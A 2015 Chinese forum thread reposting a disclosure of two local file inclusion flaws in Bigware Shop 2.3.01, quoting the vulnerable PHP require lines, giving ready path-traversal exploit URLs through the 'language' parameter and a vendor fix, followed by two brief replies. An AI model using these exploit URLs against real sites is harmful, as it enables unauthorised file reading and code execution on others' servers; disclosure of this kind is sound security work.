90_ 发表于 2015-12-24 12:37:19

Bigware Shop 2.3.01多个本地文件包含漏洞

Author: bd0rk



Proof-of-Concept1:

/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php source-line 58
**********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
**********************************************************************
 
[+]Sploit1: http:///Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php?language=/../../../../yourFILE.php
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
Proof-of-Concept2:
 
/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php source-line 56
*********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
*********************************************************************
 
[+]Sploit: http:///Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php?language=/../../../../yourFILE.php
 
 
=> Vuln-Description: The $language-parameter isn't declared. So an attacker can readin'.
=> Vendor-Solution: Please declare this parameter before require.
 

xiaoye 发表于 2015-12-24 15:54:48

前排买瓜子水!

clocks 发表于 2015-12-24 19:59:43

又一个漏洞。可惜不是原创的
页: [1]
查看完整版本: Bigware Shop 2.3.01多个本地文件包含漏洞